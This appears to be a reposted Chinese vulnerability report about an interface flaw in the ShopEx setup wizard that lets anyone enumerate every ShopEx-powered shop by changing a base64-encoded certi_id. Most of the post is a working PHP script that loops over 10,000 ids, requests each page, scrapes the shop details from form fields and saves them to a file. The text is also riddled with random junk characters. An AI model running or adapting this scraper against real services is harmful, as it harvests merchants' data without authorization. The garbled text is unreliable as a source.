|
简要描述:( ]4 t( w L' Y, w
ShopEx某接口缺陷,可遍历所有网站% t& s% }/ D8 ?; e& ?' Z5 L+ u* L3 a
详细说明: L: O5 r, O& z, D& n, W
问题出现在shopex 网店使用向导页面
$ c7 h( x* n2 |+ x. M% y0 z4 v) o& q3 w O
5 @& \6 ~3 f8 ?2 G9 L; w
' K, K" H% N) M B6 Vhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
$ F5 U& Y5 ^5 |. c3 Q
. A8 V4 V9 X2 l. P; e7 M. E# r) L3 v1 E" C x# n
- }3 o v( B, E% w4 \+ m% p
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}! B; l9 n Y) c1 A- @5 v
j" s8 G" `) j6 W* A
9 K1 O$ O( u+ A2 N/ Y: l) G: e& {% W9 p' c# X
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 $ z% \- g( j( V, j% H
; e3 w% K, A2 P' ]' b4 j, e
. \+ K/ T% N- |, u, d. n1 y
8 E! l, A$ o% ]. X<?php
A! v! S% Z0 p4 e4 r4 t
7 t; ~2 J5 v% P for ($i=1; $i < 10000; $i++) { //遍历0 T' ^* `, p z4 h$ ~
- ^$ ^4 l9 U1 s: \- z; E* W
ShowshopExD($i);
. z, z! y/ D. o. v* N. z9 `- ~$ G* _" O6 ^. U2 ]2 p, n, T6 M
}7 t# U1 N$ Q, i/ [9 n
4 K' O) P0 Q: ]0 @$ H; n function ShowshopExD($cid) {
3 ^) p# m4 E# }4 j: {" m# ~7 e: m9 s; t( _, ~( ?2 A
$url='http://guide.ecos.shopex.cn/step2.php';9 b' i M6 ~$ v- F
* }- k% N6 n2 W( V2 v8 H( N$ |9 q $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 A) \' S0 z& f' Y9 m% ?+ q$ E' a6 T% {( F* F* H1 u; B. `- _* C# o* H
$url = $url.'?refer='.$refer;0 q) L4 E- z4 I7 n& E4 T
: d$ E. n1 e7 R- a; y* j7 { $ch = curl_init($url);
$ ~/ c# a, T2 G# J" f# v
C2 }) K) ]( m( M2 r* c) s% U curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 K1 M* v% S$ C) D" ]5 H, P* N$ W9 {, [+ h3 O B
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- P) o9 m. x0 L. {" z% S, o4 |* l( V+ X8 K% o
$result = curl_exec($ch);
* X9 z0 {& W. u' F- [) `1 a' |' z+ [
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
) N- M" n; t+ K) I0 w) v) Y, x: G/ |- k v8 T
if(strpos($result,$refer))
; S7 N0 X/ m- s
' v- m! @) s$ w" D5 N3 w! D% v1 s1 G. c {
2 I' e1 S" \+ f7 ~
, V$ b/ H0 ^" Q $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
; k. ]6 ?' p) D5 E) {5 I
0 E. L0 x K: W5 \0 o preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);# u5 v8 A* g( P, F
1 K; C% h5 n( Z% I7 x foreach ($value[1] as $key) {
5 w' ?/ i& N( r9 o4 ]4 `
' S. q, e0 x/ R# [5 b3 F& U preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);- a4 S$ @, B N k
, R" T f% A2 c% I; |# G9 c& R echo $res[1][0].':'.$res[3][0]."\r\n";
, ]9 A4 Q/ z3 s' i5 Q0 C5 A ]8 M3 e `8 j& S
$col =$res[1][0].':'.$res[3][0]."\r\n";
2 C' z' c4 Y7 y7 u! L& @
6 V: d! _+ Q+ u F3 ]0 q, K+ [2 C9 O2 r fwrite($fp, $col, strlen($col));
8 b- i, ~- C! [8 b2 [2 E' G
, D: D0 f/ `: h0 ? }7 m( L1 P' T) S# c i6 O
( G$ g4 ?8 b2 a8 L9 V+ l echo '--------------------------------'."\r\n";$ v6 V# `6 H/ A3 C5 [& |: h
: t4 p$ b8 S8 `% T0 ^+ L+ w fclose($fp);
& h3 ]/ E: A* q6 z/ Y) I3 `
0 ~. S* ?6 Q! v6 I }
" F7 |+ R8 D4 i, D1 q6 k
% u" O" U- `9 j9 k) o4 m" Z flush();
e5 ^( S% Q4 l A+ |% G; \% ~8 M9 c. ?9 n0 V) j; g
curl_close($ch);# K0 b3 v9 a* `
k, W2 b ?" J* d: f- d
}* w2 W O! p1 r* p# X) j" I
+ S& h* H) M( [3 c. t7 U& ]4 A4 [9 L?>* D. x# s0 F5 K" l) L
漏洞证明:
7 {# ]; l* T! Ihttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg) P4 r2 a5 g$ B7 s O: L
refer换成其他加密方式
9 o- q( @ }- o |
|